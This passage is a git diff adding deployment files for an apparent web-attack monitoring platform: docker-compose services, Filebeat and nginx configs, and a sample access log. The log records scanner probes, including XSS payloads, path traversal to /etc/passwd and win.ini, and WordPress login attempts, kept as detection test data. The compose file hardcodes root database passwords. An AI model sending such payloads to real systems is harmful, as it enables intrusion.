+ - '5601:5601' + environment: + ELASTICSEARCH_URL: http://elasticsearch:9200 + + # 分析端 + w3aAnalysisAgent: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.11 + environment: + - topic=weblogs + - kafka=kafka:9092 + - openapi=w3aworkapi:8080 + - modes=analyze + + # 告警端 + w3aAlterAgent: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.11 + environment: + - topic=weblogs + - kafka=kafka:9092 + - openapi=w3aworkapi:8080 + - modes=alters + + # 资产采集端 + w3aAssetsAgent: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.11 + environment: + - openapi=w3aworkapi:8080 + - modes=assets + + # 漏洞扫描联动端 + w3aWebScanAgent: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-agent:v1.0.11 + environment: + - redis=w3aRedis:6379 + - arachni=w3aArachni:7331 + - openapi=w3aworkapi:8080 + - modes=vulscan + + # web漏洞扫描(Arachni) + w3aWebScanAgent: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-arachni:v1.0.11 + ports: + - "7331:7331" + command: bin/arachni_rest_server --address 0.0.0.0 + environment: + - redis=w3aRedis:6379 + - arachni=w3aArachni:7331 + - openapi=w3aworkapi:8080 + - modes=vulscan + + # Web前端 + w3aFrotend: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-frontend:v1.0.11 + ports: + - '81:80' + depends_on: + - w3aDashboard + + # 平台侧 + w3aDashboard: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-dashboard:v1.0.11 + ports: + - '8081:8080' + environment: + - MYSQL_ADDRESS=jdbc:mysql://w3aMysql:3306/w3a_soc?characterEncoding=utf-8&useSSL=false + - MYSQL_USERNAME=root + - MYSQL_PASSWORD=testw3a + - REDIS_HOST=w3aRedis + - REDIS_PORT=6379 + - REDIS_DATABASE=5 + - COS_ACCESSKEY=XXXXX + - COS_SECRETKEY=XXXXX + - COS_REGIONNAME=XXXXX + - COS_BUCKETNAME=XXXXX + - COS_BASEURL=https://XXXX.cos.XXXXX.myqcloud.com + depends_on: + - w3aMysql + - w3aRedis + + # workAPI + w3aworkapi: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-workapi:v1.0.11 + ports: + - '8082:8080' + environment: + - MYSQL_ADDRESS=jdbc:mysql://w3aMysql:3306/w3a_soc?characterEncoding=utf-8&useSSL=false + - MYSQL_USERNAME=root + - MYSQL_PASSWORD=testw3a + - REDIS_HOST=w3aRedis + - REDIS_PORT=6379 + - REDIS_DATABASE=4 + depends_on: + - kafka + depends_on: + - w3aMysql + - w3aRedis + + # openAPI + w3aopenapi: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/w3a-openapi:v1.0.11 + ports: + - '8083:8080' + environment: + - MYSQL_ADDRESS=jdbc:mysql://w3aMysql:3306/w3a_soc?characterEncoding=utf-8&useSSL=false + - MYSQL_USERNAME=root + - MYSQL_PASSWORD=testw3a + - REDIS_HOST=w3aRedis + - REDIS_PORT=6379 + - REDIS_DATABASE=4 + depends_on: + - kafka + depends_on: + - w3aMysql + - w3aRedis + + # mysql + w3aMysql: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/mysql:v1 + volumes: + - ./db/init.sql:/docker-entrypoint-initdb.d/init.sql + ports: + - '3306:3306' + environment: + - MYSQL_ROOT_PASSWORD=testw3a + + # redis + w3aRedis: + image: registry.cn-beijing.aliyuncs.com/aidolphins_com/redis:v1 + ports: + - '6379:6379' + diff --git a/deploy/docker-compose-x86_64/filebeat-kafka.yml b/deploy/docker-compose-x86_64/filebeat-kafka.yml new file mode 100644 index 0000000..6a2d99b --- /dev/null +++ b/deploy/docker-compose-x86_64/filebeat-kafka.yml @@ -0,0 +1,37 @@ +filebeat.inputs: +- type: kafka + enabled: true + hosts: ["kafka:9092"] + topics: ["weblogs"] + group_id: "weblogs" + + json.keys_under_root: true + json.add_error_key: true + json.overwrite_keys: true + +output.elasticsearch: + hosts: ["elasticsearch:9200"] + index: "weblog-%{+yyyy.MM.dd}" +setup.template.name: "filebeattest" +setup.template.pattern: "filebeattest-*" +processors: + # kafka的消息会在message字段,通过该processor将json解析出来 + - decode_json_fields: + fields: ["message"] + process_array: true + max_depth: 1 + target: "" + overwrite_keys: true + add_error_key: true + # 下边这两个处理器根据自身需求设置 + # 将json中start_time字段的时间放到@timestamp中 + - timestamp: + # 格式化时间值 给 时间戳 + field: start_time + # 使用我国东八区时间 格式化log时间 + timezone: Asia/Shanghai + layouts: + # - '2006-01-02 15:04:05' + - '2006-01-02 15:04:05.999' + test: + - '2019-06-22 16:33:51.111' diff --git a/deploy/docker-compose-x86_64/filebeat-nginx.yml b/deploy/docker-compose-x86_64/filebeat-nginx.yml new file mode 100644 index 0000000..0393122 --- /dev/null +++ b/deploy/docker-compose-x86_64/filebeat-nginx.yml @@ -0,0 +1,14 @@ +filebeat.inputs: +- type: log + enabled: true + fields: + source: nginx_access_log + paths: + - /var/log/nginx/access*.log + json.keys_under_root: true + json.overwrite_keys: true + +output.kafka: + hosts: ["kafka:9092"] + topic: weblogs + required_acks: 1 diff --git a/deploy/docker-compose-x86_64/nginx.conf b/deploy/docker-compose-x86_64/nginx.conf new file mode 100644 index 0000000..57ae144 --- /dev/null +++ b/deploy/docker-compose-x86_64/nginx.conf @@ -0,0 +1,58 @@ +# Based on https://www.nginx.com/resources/wiki/start/topics/examples/full/#nginx-conf +# user www www; ## Default: nobody + +worker_processes auto; +#error_log "/opt/bitnami/nginx/logs/error.log"; +pid "/tmp/nginx.pid"; + +events { + worker_connections 1024; +} + +http { + include mime.types; + default_type application/octet-stream; + log_format main '$remote_addr - $remote_user [$time_local]' + '"$request" $status $body_bytes_sent "$http_referer" ' + '"$http_user_agent" "$http_x_forwarded_for" "$http_host" "$request_time" "$upstream_response_time" "$request_body"'; + #access_log "/opt/bitnami/nginx/logs/access.log" main; + log_format log_json '{"@timestamp": "$time_local","request_body":"$request_body","remote_addr":"$remote_addr","http_host":"$http_host","request":"$request","status":"$status","body_bytes_sents":"$body_bytes_sent","req_time":"$request_time","http_user_agent":"$http_user_agent", "http_referer":"$http_referer", "request_method":"$request_method", "http_x_forwarded_for":"$http_x_forwarded_for"}'; + #access_log "/usr/local/openresty/nginx/logs/access.log" log_json; + add_header X-Frame-Options SAMEORIGIN; + + client_body_temp_path "/tmp/client_body" 1 2; + proxy_temp_path "/tmp/proxy" 1 2; + fastcgi_temp_path "/tmp/fastcgi" 1 2; + scgi_temp_path "/tmp/scgi" 1 2; + uwsgi_temp_path "/tmp/uwsgi" 1 2; + client_body_buffer_size 1024k; + fastcgi_buffers 32 16k; + sendfile on; + gzip on; + gzip_http_version 1.0; + gzip_comp_level 2; + gzip_proxied any; + gzip_types text/plain text/css application/javascript text/xml application/xml+rss; + keepalive_timeout 65; + client_max_body_size 80M; + server_tokens off; + + #include "/opt/bitnami/nginx/conf/server_blocks/*.conf"; + + # HTTP Server + server { + lua_need_request_body on; + access_log "/usr/local/openresty/nginx/logs/access.log" log_json; + listen 8080; + server_name api.example.com; + + location / { + proxy_pass "http://www.aidolphins.com"; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + root html; + index index.html index.htm; + } + } +} diff --git a/deploy/docker-compose-x86_64/web/log/access.log b/deploy/docker-compose-x86_64/web/log/access.log new file mode 100644 index 0000000..5440eaa --- /dev/null +++ b/deploy/docker-compose-x86_64/web/log/access.log @@ -0,0 +1,75559 @@ +{"@timestamp": "03/May/2022:15:14:00 +0000","request_body":"fucn=111&do=1","remote_addr":"172.23.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.036","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:15:24:32 +0000","request_body":"xxx=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /dex/d HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.028","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:15:57:36 +0000","request_body":"xx=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /dede/ded1111 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:15:58:01 +0000","request_body":"x11","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /de19919119 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:32 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:34 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:34 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:35 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:37 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:37 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:38 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:38 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:38 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:39 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:39 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:39 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:39 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:40 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:41 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:45 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx1111 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:48 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx13111 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:51 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx13141 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.029","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:54 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx13145 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:11:57 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx13146 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:12:00 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx131461 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:12:03 +0000","request_body":"xxx1=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hids/xx1314612 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.036","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:14:35 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.040","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:14:36 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.037","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:14:38 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.036","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:14:40 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:14:40 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:14:41 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.038","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:14:42 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.038","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:15:50 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.028","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:15:50 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.031","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:15:52 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.028","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:15:52 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.034","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:15:53 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:15:54 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:15:55 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.028","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:15:56 +0000","request_body":"fucn=111&do=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /depage/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.027","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:44:22 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.466","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:44:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.424","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:44:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.804","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:44:44 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.954","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:44:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.807","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:45:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.255","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:17:45:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.664","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webalizer/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.413","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/28fHqXR9Gf0J00IV2Kb3vqEUF8m/)%3B%2F%2F HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.441","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ccm/system/panels/page/preview_as_user/preview?cID=\x22> HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.415","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.498","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.564","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.533","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.537","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.533","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.542","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cp/Shares?user=&protocol=webaccess&v=2.3 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.536","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /composer.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.481","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:01:51 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET 